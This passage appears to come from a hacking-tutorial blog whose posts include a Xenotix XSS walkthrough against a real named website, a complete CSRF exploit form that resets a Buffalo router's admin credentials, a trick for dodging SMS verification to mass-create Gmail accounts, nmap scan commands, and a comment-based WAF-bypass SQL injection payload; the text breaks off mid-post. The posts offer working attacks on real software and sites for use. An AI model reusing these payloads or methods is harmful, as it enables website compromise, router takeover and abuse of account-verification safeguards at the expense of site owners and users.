src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgki4mU6qeYSHy9OWNeZkjHHhXeyc-YnQ8lk517XcyQWLiERZqn2hWy5KHdoWTuygXpAgsb-J3n4z5mdyZeOkEY1QpFrqgQyUu0d4cKT2qSAo0mPqwYSAAnDHXc4rZuNhTJGpJUS1FdVTht/s1600/xenotix+Xss+Exploration.png" /></a></div>Xenotix Exploit Framework includes highly offensive XSS exploitation modules for Penetration Testing and Proof of Concept creation.<br /> It has got various modules <br /> <b>SCANNER MODULES</b> includes<br /> <li>Manual Mode Scanner<br /> which actually manully allow you to check all payload one by one<br /> <li>Auto Mode Scanner<br /> this feature allow you to auto mate the payload execution to your target<br /> <li>DOM Scanner<br /> this scan and check for xss based on dom (Document Object Model)<br /> <li>Multiple Parameter Scanner<br /> this is use for checking for xss based on multiple parameter<br /> <li>POST Request Scanner<br /> this allows you to check for xss on post request whcih helps a lot in modern technology based website<br /> <li>Header Scanner<br /> check in the header part for xss attack<br /> <li>Fuzzer<br /> xss fuzzer allow you an option to scan on user independednt parameter by just putting [X] int he parameter<br /> <li>Hidden Parameter Detector<br /> this feature allow you to detect parameter for xss attack automatically.<br /> <br /> Xenotix has also go the <b>INFORMATION GATHERING MODULES</b> which helps you on Enumeration target and get enough information on victim url<br /> <br /> some of its feature are<br /> <li>Victim Fingerprinting<br /> <li>Browser Fingerprinting<br /> <li>Browser Features Detector<br /> <li>Ping Scan<br /> <li>Port Scan<br /> <li>Internal Network Scan<br /> <br /> It also has <b>EXPLOITATION MODULES</b> Which has a Great option to exploit any xss vulnerable target <br /> <li>Send Message<br /> <li>Cookie Thief<br /> <li>Phisher<br /> <li>Tabnabbing<br /> <li>Keylogger<br /> <li>HTML5 DDoSer<br /> <li>Executable Drive By<br /> <li>JavaScript Shell<br /> <li>Reverse HTTP WebShell<br /> <li>Drive-By Reverse Shell<br /> <li>Metasploit Browser Exploit<br /> <li>Firefox Reverse Shell Addon (Persistent)<br /> <li>Firefox Session Stealer Addon (Persistent)<br /> <li>Firefox Keylogger Addon (Persistent)<br /> <li>Firefox DDoSer Addon (Persistent)<br /> <li>Firefox Linux Credential File Stealer Addon (Persistent)<br /> <li>Firefox Download and Execute Addon (Persistent)<br /> <br /> Xenotix has 1500+ payload for checking xss attack on any url. Ajin Abraham is the creator of OWASP Xenotix XSS Exploit Framework.<br /> Ajin has already posted white paper at <br /> <li><a href="http://www.exploit-db.com/wp-content/themes/exploit/docs/21223.pdf">Exploit-db Xss Attack</a><br /> <li><a href="http://packetstormsecurity.org/files/116455/Detecting-And-Exploiting-XSS-With-Xenotix-XSS-Exploit-Framework.html">Packet Storm XSS By ajin</a>Etc<br /> <br /> also posted video tutorial you can just have practical demo.<br /> <iframe width="420" height="315" src="//www.youtube.com/embed/dCo5BCJWOdA" frameborder="0" allowfullscreen></iframe><br /> <br /> enough about tool lets try Practically explore a target for detecting xss attack.<br /> <br /> lets take http://www.webopedia.com/ (Alexa Rank Global 4631 ,India Flag 920)as example <br /> now it has a search box now we will explore more on it and find our xss attack on it.<br /> so first of all download Xenotix <a href="https://www.dropbox.com/s/ookdse6pyszh736/Xenotix%20XSS%20Exploit%20Framework%20V4.rar">Here</a><br /> After downloading open Xenotix XSS Exploit Framework.exe<br /> first of all set the configur server and give your ip 192.168.xxx.xxx and port to be xxyz then click on start<br /> next just search for darksite.co.in on www.webopedia.com and get the ulr you will see something like this<br /> <blockquote>http://www.webopedia.com/sgsearch/results?cx=partner-pub-8768004398756183%3A6766915980&cof=FORID%3A10&ie=UTF-8&q=darksite.co.in<br /> </blockquote>so we see some thing like q=..... so that is our vulnreable parameter lets exploit it using xenotix<br /> So here it is we got our xss at now put the url at the address box and then go to scanner on menu bar and select manual mode<br /> <div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhyKpw5JJ94xocZe-a7aka_HK0AQlkEh6hhNz_yOIy0fEWxz64aD6kUS-tXyOhImmfbBFE04gsPGif_v9QxtO5IhQ9xVGdH7CXonqM7i3smfzpHv0RTvZemMYxYYsfpRj-uIcXnDGiKsPie/s1600/9789u.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="detecting xss with xenotix" height="300" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhyKpw5JJ94xocZe-a7aka_HK0AQlkEh6hhNz_yOIy0fEWxz64aD6kUS-tXyOhImmfbBFE04gsPGif_v9QxtO5IhQ9xVGdH7CXonqM7i3smfzpHv0RTvZemMYxYYsfpRj-uIcXnDGiKsPie/s1600/9789u.png" width="550" /></a></div>keep clicking next exploit and it run concurrently three different browser<br /> <blockquote>http://www.webopedia.com/sgsearch/results?cx=partner-pub-8768004398756183:6766915980&cof=FORID:10&ie=UTF-8&q=*<*script*>*+*alert("XSS")*<*/*SCRIPT*>*<br /> (remove '*' from url)<br /> </blockquote> so finally we got the xssed :)<br /> <div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgBgRXdHzT9A2rSpfojb242sH8XuPbfk-O1pwF8F7CwxKP7iK1HXrH86yXddAoRYmVOUwGu1cUS_oSYckQorS0czB29BmBQr1hWACqZ7NCRGfn7jCdwi7V6kYrAw7qqAcW3c-iAuIr3LZn7/s1600/12313.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="exploiting xss with xenotix" height="300" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgBgRXdHzT9A2rSpfojb242sH8XuPbfk-O1pwF8F7CwxKP7iK1HXrH86yXddAoRYmVOUwGu1cUS_oSYckQorS0czB29BmBQr1hWACqZ7NCRGfn7jCdwi7V6kYrAw7qqAcW3c-iAuIr3LZn7/s1600/12313.png" width="550" /></a></div>So this is how we just tried a basic use of xenotix fro exploit xss<br /> so later on i will try to put some more tutorial using xenotix utilizing its different features<br /> trust me its one of the best tool for xss attack and using this i got many such xss on top rated sites.<br /> do explore more and if you have any query do comments/Suggestion for Improvements below

Xenotix XSS Exploit Framework V4 A Perfect Tool For Xss Exploiting | Advance XSS Detecting Frame work

Hi everyone today i am going give you a brief explanation on Xenotix Tool It is a tool specially crafted for detecting XSS And Exploiting th...

Read more »

How To Hack Wireless Modem | Reset Username And Password

Hello friends after a long day gap today i am going to post a small tutorial on how you can hack the modem devices.<br /> So Lets Begin This vulnerability is known as CSRF (Cross-site request forgery) or some say it to be one-click attack so it is a type of attack that allow hackers to change/modify/update on currently connected website/url.<br /> <div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjwL9_zMB8qeLE4wVtlXuHTAsgsz4lgL5ARAJkci6KT1n5rHKavvsWWErRHMw63fcK1dEntf0bBnLW-QLAUliKGySbK9nljVSaus4MIfZQ_CPjw-O19ifXhmL9GeCzyr-xR_KlLVjxNg_55/s1600/modem+hacking.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="modem hacking" height="300" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjwL9_zMB8qeLE4wVtlXuHTAsgsz4lgL5ARAJkci6KT1n5rHKavvsWWErRHMw63fcK1dEntf0bBnLW-QLAUliKGySbK9nljVSaus4MIfZQ_CPjw-O19ifXhmL9GeCzyr-xR_KlLVjxNg_55/s320/modem+hacking.jpg" width="550" /></a></div><br /> so how hacker use this CSRF attack To change Modem Password and Username lets do it step by step.<br /> for doing this you just need to now what all parameter the cgi page is using.<br /> now consider that you know the parameter that the reset successful page is taking after knowing those things you just need to create a html page that basically call that cgi/successful confirmation on the form action parameter and after doing it the password will successfully changed so i think you must have got some confused lets do it practically.<br /> <br /> i am taking an example that is already submitted by one of my friend Prayas a Real quality security expert.<br /> There is a CSRF vulnerability in the Buffalo WZR-HP-G300NH2(A high Speed wireless Modem) and any one easily change or manipulate the admin username and password. This is will POST request and any one can craft malicious html form with specially crafted POST request <br /> to the router and on execution of the form the router's user name and password can be changed to anything.<br /> Here is the exploit<br /> <textarea rows="10" cols="70"><br /> <html><br /> <!-- Exploit Code by Prayas Kulshrestha --><br /> <body><br /> <h1>This is the PoC for the CSRF vulnerability in the buffalo router Powered by DD-WRT v24SP2-MULTI (10/31/11) std (SVN revision 17798)</h1><h2>click below to see the magic</h2><form action="http://192.168.1.1/apply.cgi" method="POST"><input type="hidden" name="submit_button" value="Management" /><br /> <input type="hidden" name="action" value="ApplyTake" /><br /> <input type="hidden" name="change_action" value="" /><br /> <input type="hidden" name="submit_type" value="" /><br /> <input type="hidden" name="commit" value="1" /><br /> <input type="hidden" name="PasswdModify" value="0" /><br /> <input type="hidden" name="remote_mgt_https" value="0" /><br /> <input type="hidden" name="http_enable" value="1" /><br /> <input type="hidden" name="info_passwd" value="0" /><br /> <input type="hidden" name="https_enable" value="0" /><br /> <input type="hidden" name="http_username" value="root" /><br /> <input type="hidden" name="http_passwd" value="hacked" /><br /> <input type="hidden" name="http_passwdConfirm" value="hacked" /><br /> <input type="hidden" name="_http_enable" value="1" /><br /> <input type="hidden" name="refresh_time" value="3" /><br /> <input type="hidden" name="status_auth" value="1" /><br /> <input type="hidden" name="maskmac" value="1" /><br /> <input type="hidden" name="remote_management" value="0" /><br /> <input type="hidden" name="remote_mgt_ssh" value="0" /><br /> <input type="hidden" name="remote_mgt_telnet" value="0" /><br /> <input type="hidden" name="remote_ip_any" value="1" /><br /> <input type="hidden" name="remote_ip" value="4" /><br /> <input type="hidden" name="remote_ip_0" value="0" /><br /> <input type="hidden" name="remote_ip_1" value="0" /><br /> <input type="hidden" name="remote_ip_2" value="0" /><br /> <input type="hidden" name="remote_ip_3" value="0" /><br /> <input type="hidden" name="remote_ip_4" value="0" /><br /> <input type="hidden" name="boot_wait" value="on" /><br /> <input type="hidden" name="cron_enable" value="1" /><br /> <input type="hidden" name="cron_jobs" value="" /><br /> <input type="hidden" name="nas_enable" value="1" /><br /> <input type="hidden" name="resetbutton_enable" value="1" /><br /> <input type="hidden" name="zebra_enable" value="1" /><br /> <input type="hidden" name="ipv6_enable0" value="0" /><br /> <input type="hidden" name="radvd_enable" value="0" /><br /> <input type="hidden" name="radvd_conf" value="" /><br /> <input type="hidden" name="enable_jffs2" value="0" /><br /> <input type="hidden" name="clean_jffs2" value="0" /><br /> <input type="hidden" name="language" value="english" /><br /> <input type="hidden" name="tcp_congestion_control" value="vegas" /><br /> <input type="hidden" name="ip_conntrack_max" value="4096" /><br /> <input type="hidden" name="ip_conntrack_tcp_timeouts" value="3600" /><br /> <input type="hidden" name="ip_conntrack_udp_timeouts" value="120" /><br /> <input type="hidden" name="samba_mount" value="0" /><br /> <input type="hidden" name="samba_share" value="//yourserverip/yourshare" /><br /> <input type="hidden" name="samba_user" value="username/computer" /><br /> <input type="hidden" name="samba_password" value="iwer573495u7340" /><br /> <input type="hidden" name="samba_script" value="yourscript" /><br /> <input type="submit" value="Owned !" /><br /> </form></body><br /> </html><br />
Save this as anything.htm and this will change the router's user name and password.

username:root
password:hacked
Download The Whole Exploit Here
Now we just did this for Buffalo Modem but as my point of view this particular vulnerability also hit common modem devices like BSNL Modem on rest.cgi,Few D-link wireless modem.You can try your Experiment and put your comments below if you are facing any doubt.

Thank You for reading Do share comment likes :)

How To Hack Wireless Modem | Reset Username And Password

Hello friends after a long day gap today i am going to post a small tutorial on how you can hack the modem devices. So Lets Begin This vuln...

Read more »

How to install Kali Linux on Android Phone | Tablet

<div class="separator" style="clear: both; text-align: center;"><a href="http://www.kali.org/wp-content/uploads/2013/09/kali-android-deploy.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="300" src="http://www.kali.org/wp-content/uploads/2013/09/kali-android-deploy.png" width="560" /></a></div><br /> This post is basically installing kali Os On Android Devices.Now Getting Kali Linux to run on ARM hardware has been a major goal for us since day one. So far, They've built native images for the Samsung Chromebook, Odroid U2, Raspberry Pi, RK3306, Galaxy Note 10.1, CuBox, Efika MX, and BeagleBone Black to name a few. This however does not mean you cannot install Kali Linux in a chroot on almost any modern device that runs Android. In fact, the developers of Linux Deploy have made it extremely easy to get any number of Linux distributions installed in a chroot environment using a simple GUI builder.<br /> <br /> <b>PREREQUISITES</b><br /> <br /> <li>A device running Android 2.1 and above, rooted.<br /> <li>At least 5 GB free space on internal or external storage.<br /> <li>A fast, wireless internet connection.<br /> <li>Patience to wait for a distribution to bootstrap from the network.<br /> <br /> <b>CONFIGURING LINUX DEPLOY FOR KALI</b><br /> <br /> There’s actually very little to be done to get Kali installed. By choosing Kali Linux in the “Distribution” tab, you’ve pretty much covered the important stuff. Optionally, you can choose your architecture, verify that the Kali mirror is correct, set your installation type and location on your Android device, etc. Generally speaking, the defaults provided by Linux Deploy are good to begin with.<br /> <br /> <b>BUILDING THE KALI IMAGE</b><br /> <br /> <div class="separator" style="clear: both; text-align: center;"><a href="http://www.kali.org/wp-content/uploads/2013/09/linux-deploy-kali-list-00-576x1024.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="500" src="http://www.kali.org/wp-content/uploads/2013/09/linux-deploy-kali-list-00-576x1024.png" width="560" /></a></div><br /> Once you are happy with all the settings, hitting the “install” button will start a Kali Linux bootstrap directly from our repositories. Depending on your Internet connection speed, this process could take a while. You’ll be downloading a base install of Kali Linux (with no tools) at minimum.<br /> <br /> <b>STARTING UP YOUR CHROOTED KALI<br /> </b><br /> Once the installation is complete, you can have Linux Deploy automatically mount and load up your Kali Linux chroot image. This also includes the starting of services such as SSH and VNC for easier remote access. All of this is automatically done by hitting the “<b>start</b>” button. You should see Linux Deploy setting up your image with output similar to the following:<br /> <br /> <div class="separator" style="clear: both; text-align: center;"><a href="http://www.kali.org/wp-content/uploads/2013/09/install-kali-linux-deploy.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="300" src="http://www.kali.org/wp-content/uploads/2013/09/install-kali-linux-deploy.png" width="560" /></a></div><br /> At this stage, Linux Deploy has started a VNC and SSH server inside your chrooted Kali image. You can connect to the Kali session remotely using the IP address assigned to your Android device (in my case, 10.0.0.10).<br /> LOGGING IN TO YOUR CHROOTED KALI<br /> <br /> Now you can use either a SSH or VNC client to access your Kali instance. The VNC password is “<b>changeme</b>” and the SSH credentials are “android” for the username (configured via Linux Deploy) and “<b>changeme</b>” as the password.<br /> <br /> muts@slim:~$ ssh android@10.0.0.10<br /> android@10.0.0.10 password:<br /> Linux localhost 3.4.5-447845 #1 SMP PREEMPT Fri Apr 12 17:22:34 KST 2013 armv7l<br /> Kali GNU/Linux 1.0 [running on Android via Linux Deploy]<br /> android@localhost:~$ sudo su<br /> root@localhost:/home/android# df<br /> Filesystem 1K-blocks Used Available Use% Mounted on<br /> /dev/loop3 4180944 667268 3304012 17% /<br /> tmpfs 952708 80 952628 1% /dev<br /> tmpfs 952708 0 952708 0% /dev/shm<br /> root@localhost:/home/android#<br /> root@localhost:/home/android# apt-get update<br /> Hit http://http.kali.org kali Release.gpg<br /> Hit http://http.kali.org kali Release<br /> Hit http://http.kali.org kali/main Sources<br /> Hit http://http.kali.org kali/contrib Sources<br /> Hit http://http.kali.org kali/non-free Sources<br /> Hit http://http.kali.org kali/main armel Packages<br /> Hit http://http.kali.org kali/contrib armel Packages<br /> Hit http://http.kali.org kali/non-free armel Packages<br /> Ign http://http.kali.org kali/contrib Translation-en_US<br /> Ign http://http.kali.org kali/contrib Translation-en<br /> Ign http://http.kali.org kali/main Translation-en_US<br /> Ign http://http.kali.org kali/main Translation-en<br /> Ign http://http.kali.org kali/non-free Translation-en_US<br /> Ign http://http.kali.org kali/non-free Translation-en<br /> Reading package lists... Done<br /> root@localhost:/home/android#<br /> <div class="separator" style="clear: both; text-align: center;"><a href="http://www.kali.org/wp-content/uploads/2013/09/linux-deploy-mount-1024x847.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="300" src="http://www.kali.org/wp-content/uploads/2013/09/linux-deploy-mount-1024x847.png" width="560" /></a></div><br /> If left unchanged, Linux Deploy will automatically set an image size of around 4 GB, for a “naked” installation of Kali. If you would like to install additional Kali tools down the road, you might want to consider using a larger image size, which is configurable via the settings in Linux Deploy.<br /> <b>LOCAL VNC CONNECTIONS</b><br /> this is just a try couple of VNC clients to get one to work properly. Although controlling Kali through a local VNC client isn’t the most convenient of tasks, it certainly is possible. However, we suspect that most people will be SSH’ing into this instance. The picture below was overlayed with a Kali Linux desktop screenshot taken from a Galaxy S4.<br /> <br /> <div class="separator" style="clear: both; text-align: center;"><a href="http://www.kali.org/wp-content/uploads/2013/09/galaxy-s4-kali-linux-1024x682.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="300" src="http://www.kali.org/wp-content/uploads/2013/09/galaxy-s4-kali-linux-1024x682.jpg" width="560" /></a></div><br /> So Install it and Have fun :).

How to install Kali Linux on Android Phone | Tablet

This post is basically installing kali Os On Android Devices.Now Getting Kali Linux to run on ARM hardware has been a major goal for us sin...

Read more »

How To Bypass sms| Phone Verification on Any Login Panel

Hello everyone this is a small trick that has been used by many hackers to bypass phone / log in sms verification.<br /> As you know these days many sites(like facebook,gmail...etc) use sms verification...so <b>why is this sms verication?</b><br /> <div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhhEmIc9Hie2FGi_Jxegypf7Jme0dB6o1ca3oFO8fDjsDW1tiqR9ZUm8Sa5O_KMB3SjFg4kMQu7sOsoMfffVYiAN7nha3X1WS-g6Bp7BUGMMhnARzg76vfO61IxAdSERXMMTSMPLNIdWjrC/s1600/gmail-51.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="Bypass sms verification" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhhEmIc9Hie2FGi_Jxegypf7Jme0dB6o1ca3oFO8fDjsDW1tiqR9ZUm8Sa5O_KMB3SjFg4kMQu7sOsoMfffVYiAN7nha3X1WS-g6Bp7BUGMMhnARzg76vfO61IxAdSERXMMTSMPLNIdWjrC/s1600/gmail-51.jpg" /></a></div>Itz very simple<br /> <li>Keep Log in process Secured with additional security <br /> <li>Banning spammer to login<br /> <li>Marketing and Advertisement <br /> <br /> So now we will be learning how can we bypass gmail (facebook, youtube, other shopping sites) without SMS verification. Because gmail allow to create only few account. When you try to create more account with same mobile number, Google restricted and you can’t create more account. so we can create counter less gmail accounts using following steps.<br /> This method is very useful to Bypass SMS verification and useful when you need to Sign up any account and do not feel comfortable to giving your real number or if you want to create multiple account.<br /> <br /> So to bypass these verification follow these steps :<br /> <div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi_fF-_Qfs1-boutjb6YJQLSxPWG6fGumJ-vIR2b8o8b5f6VNeNfKXzKGHPws34aVFHnO7CtTplhqmmAoov1IamTCMemk7Nin9bmMQ_Z4KtyBwdDkt5Aozu4i-4aKfSnarAh_LGCXBiOvI4/s1600/Bypass_Phone_and_SMS_verification_of_Any_We.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi_fF-_Qfs1-boutjb6YJQLSxPWG6fGumJ-vIR2b8o8b5f6VNeNfKXzKGHPws34aVFHnO7CtTplhqmmAoov1IamTCMemk7Nin9bmMQ_Z4KtyBwdDkt5Aozu4i-4aKfSnarAh_LGCXBiOvI4/s1600/Bypass_Phone_and_SMS_verification_of_Any_We.jpg" /></a></div><li> First go to this Website : <a href="http://receive-sms-online.com/">Receive-Sms Online</a><br /> <li> Copy any one number and paste it where they are asking SMS Verification.<br /> <li> Simply come back and click the number which you have selected, check it out there is your code sent by google, youtube or whatever else.<br /> <br /> SO i believe this process is very easy to follow.<br /> <br />

How To Bypass sms| Phone Verification on Any Login Panel

Hello everyone this is a small trick that has been used by many hackers to bypass phone / log in sms verification. As you know these days m...

Read more »

How To Share File In Backtrack | kali For Penetration Testing

Hi every one this is a small article that helps a lot during any penetration testing ..some time we do need to share file with other to test our <br /> file that we have created ,whether it is working or not ...not only this some time we do need to share file with our other windows machine.<br /> <div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiThfDo3sMLvDWPlHb69BZES_R0NcfgL0PEnlz1sBx1V1ulJm11WGdk-IG66rhCQ_dlVEIvzjHpbGDOXtGgdVZQiA8cmbW1M7VgXZkE968jXFuASh8ljhNtDDya2D1MSe6AawO-8bHwrTv-/s1600/red-bt2-copy.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="Backtrack Tutorials Darksite.co.in" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiThfDo3sMLvDWPlHb69BZES_R0NcfgL0PEnlz1sBx1V1ulJm11WGdk-IG66rhCQ_dlVEIvzjHpbGDOXtGgdVZQiA8cmbW1M7VgXZkE968jXFuASh8ljhNtDDya2D1MSe6AawO-8bHwrTv-/s320/red-bt2-copy.png" /></a></div>So follow these few commands and i am sure this will help you :).<br /> Lets start<br /> <br /> At First Open the console and type these commands<br /> <br /> <b><br /> <li>mkdir /var/www/share<br /> <br /> <li>chmod -R 775 /var/www/share/<br /> <br /> <li>chown -R www-data:www-data /var/www/share/<br /> <br /> <li>ls -la /var/www/ | grep share</b><br /> <br /> Now the folder is created on path var->wwww->share what ever you need to share just put the content on that folder and simply type<br /> <br /> <b><br /> <li>service apache2 start/stop<br /> </b><br /> <br /> Now to access any file that you have put-ed on share folder simply type your Ip/share that is<br /> <br /> <b>http://192.168.xxx.xxx/share </b><br /> <br /> you will get the content simply download and have fun ...<br /> <div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEieW-rlyZbXJom4zFvCFvNC2n5Nd3oQZeC-8Ib2sbEht8KEPtag2agMO1DJnnqPzRPw3tWrF9JPzVbbE7GN2xJ7R8p88jx7D1kTXbr3JILJQi5FUO8BoIJa8n6poyVL6-xrKYk-4m6YbzNy/s1600/5.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="Share file in back track" height="390" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEieW-rlyZbXJom4zFvCFvNC2n5Nd3oQZeC-8Ib2sbEht8KEPtag2agMO1DJnnqPzRPw3tWrF9JPzVbbE7GN2xJ7R8p88jx7D1kTXbr3JILJQi5FUO8BoIJa8n6poyVL6-xrKYk-4m6YbzNy/s1600/5.png" width="560" /></a></div><br /> <br /> So directly if you want your created exploit to upload you can type following command in backtrack.<br /> <b>cp /root/.msf4/data/exploits/* /var/www/share</b><br /> It will be uploaded on server thank you for visiting do share,comment,likes :)

How To Share File In Backtrack | kali For Penetration Testing

Hi every one this is a small article that helps a lot during any penetration testing ..some time we do need to share file with other to test...

Read more »

nmap commands for hackers Kali | Backtrack Users

After along day gap lets start discussing some crispy tool yes it is hacker's love nmap that helps a lot in making things impossible possible :).<br /> <br /> <b>So What is NMAP ?</b><br /> <div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhgFG5AgIcrnLzYx_cUZsdHNB3Co4F6Suf49-bxaW30XjpRyYIGzUme8x2NZ8zYADk4aHHNHk75Ob1RGj4yj45hPdlcnsJXV67YJ8CFVaJStUk3psPdckVR30IQEFvyog4K5d-xksMyzObe/s1600/nmap.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="nmap commands" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhgFG5AgIcrnLzYx_cUZsdHNB3Co4F6Suf49-bxaW30XjpRyYIGzUme8x2NZ8zYADk4aHHNHk75Ob1RGj4yj45hPdlcnsJXV67YJ8CFVaJStUk3psPdckVR30IQEFvyog4K5d-xksMyzObe/s1600/nmap.jpg" /></a></div><br /> Nmap (Network Mapper) is a security scanner used to discover hosts and services on a computer network, thus creating a "map" of the network. To accomplish its goal, Nmap sends specially crafted packets to the target host and then analyzes the responses. Unlike many simple port scanners that just send packets at some predefined constant rate, Nmap accounts for the network conditions during the run.<br /> <br /> Nmap has been able to extend its discovery capabilities beyond simply figuring out whether a host is up or down and which ports are open and closed<br /> <br /> <b>NMAP can determine the </b><br /> <li>operating system of the target,<br /> <li>names and versions of the listening services,<br /> <li>estimated up time,<br /> <li>type of device,<br /> <li>and finally presence of a FIREWALL.<br /> <br /> <b>Nmap runs on Linux,Microsoft Windows,Solaris,HP-UX and BSD Linux is the most popular Nmap platform with Windows following it closely</b><br /> <br /> <b>Top Features of NMAP </b><br /> <br /> Nmap features include:<br /> <br /> <li>Host Discovery – Identifying hosts on a network. For example, listing the hosts which respond to pings or have a particular port open.<br /> <li>Port Scanning – Enumerating the open ports on one or more target hosts.<br /> <li>Version Detection – Interrogating listening network services listening on remote devices to determine the application name and version number<br /> <li>OS Detection – Remotely determining the operating system and some hardware characteristics of network devices.<br /> <li>Scriptable interaction with the target – using Nmap Script Engine<br /> <br /> <b><br /> Hackers COMMANDS OF NMAP</b><br /> <br /> Open ur Console in backtrack/kali and type all the commands and see their working and do connect to internet also :)<br /> <br /> * type<b>nmap</b> and press enter :: to see all the commands of nmap<br /> <br /> ** Now how to scan ips in range and to see how many are alive :: command is <br /> <br /> <b>nmap -sP 192.168.254.0/24</b><br /> <br /> *** Now how to scan ip in a specific range :: command is <br /> <br /> <b>nmap -sP 192.168.254.99-106</b><br /> <br /> like we are scanning ip from 99 to 106<br /> <br /> **** Now we will do stealth scan to see how many ports are open on the specific ip :: command is <br /> <br /> <b>nmap -sS 192.168.254.102</b> and press enter <br /> <br /> ***** Now to find what operating system running on the ip address :: command is <br /> <br /> <b>nmap -O 192.168.254.102</b><br /> <br /> ****** Now to scan for TCP connect :: command is <br /> <br /> <b>nmap -sT 192.168.254.102</b><br /> <br /> ******* Just a null scan to check whether ip is alive or not :: command is <br /> <br /> <b>nmap -sN 192.168.254.102<br /> </b><br /> ******** Now to scan for UDP connect :: command is <br /> <br /> <b>nmap -sU 192.168.254.102</b><br /> <br /> ********** To scan for IP Protocol :: command is <br /> <br /> <b>nmap -sO 192.168.254.102</b><br /> <br /> *********** To check ACKNOWLEGMENT (ACK) :: command is <br /> <br /> <b>nmap -sA 192.168.254.102</b><br /> <br /> ************* To scan for which windows is running :: command is <br /> <br /> <b>nmap -sW 192.168.254.102</b><br /> <br /> I believe that is what i know but still if i am miss some command do comment.Thank you

nmap commands for hackers Kali | Backtrack Users

After along day gap lets start discussing some crispy tool yes it is hacker's love nmap that helps a lot in making things impossible pos...

Read more »

How to bypass WAF (Web Application Firewall ) Attack On Sqli

Hello Friends as i previously spooked many times about sqli which is one of the common attack on website so today i am revealing one more trick <br /> on bypassing web application firewall.<br /> <div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhjrt0rdCp4jkv9bKbH6mF8vE0h90Zs0Cvh5cNUqXhlqd8vVfRmRteK8QjFzw0TOa9b-aLicicEBCxHn4WgbgaDEmFjIbu24GzL5WClk9xKVuueLz3ChEJn4KX1lUNI4Be5Xyo9T6nXOp5S/s1600/hackers.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhjrt0rdCp4jkv9bKbH6mF8vE0h90Zs0Cvh5cNUqXhlqd8vVfRmRteK8QjFzw0TOa9b-aLicicEBCxHn4WgbgaDEmFjIbu24GzL5WClk9xKVuueLz3ChEJn4KX1lUNI4Be5Xyo9T6nXOp5S/s1600/hackers.jpg" /></a></div><b>What is WAF?</b><br /> <br /> WAF stands for Web Application Firewall. In order to prevent the attacks such as SQLi and XSS, administrators put Web Application Firewalls. These WAFs detect malicious attempts with the use of signature based filters and escapes defined within a list of rules. As a result of this design, they are vulnerable and can be easily bypassed.<br /> <br /> <b>How it works??</b><br /> <br /> When the WAF detects malicious attempts, our input URL gives a forbidden error as shown in the following figure.<br /> <br /> Our aim is to bypass this error and need to retrieve data from the database using some special techniques. There are many methods to bypass WAF.but right now we will discuss a small trick beginner friendly here .<br /> <br /> Comments allow us to bypass a lot of the restrictions of Web application firewalls and to kill certain SQL statements to execute the attackers commands while commenting out the actual legitimate query.<br /> <b><br /> Forbidden Sqli</b><br /> http://vulnerablesite.com/detail.php?id=44 union all select 1,2,3,4,5—<br /> <div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhN_iGGf_r6TYIW2jQTgS3SnnRY1dp__2mQ-IO-PLintfwW6FW3gMMXYkjzsDfmJpA7OI9nvMSh9iQRnlKiPC52dEN9WNaJU3C5raBYsrZgKUAZo8Q4De2sZWr9zwdUKkL-Zuntpo6UeO17/s1600/4a.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhN_iGGf_r6TYIW2jQTgS3SnnRY1dp__2mQ-IO-PLintfwW6FW3gMMXYkjzsDfmJpA7OI9nvMSh9iQRnlKiPC52dEN9WNaJU3C5raBYsrZgKUAZo8Q4De2sZWr9zwdUKkL-Zuntpo6UeO17/s1600/4a.png" /></a></div><b><br /> By passed Sqli</b><br /> http://vulnerablesite.com/detailphp?id=44 /*!UNION*/ +/*!ALL*/+/*!SELECT*/+1,2,3,4,5— <br /> <div class="separator" style="clear: both; text-align: center;"><a 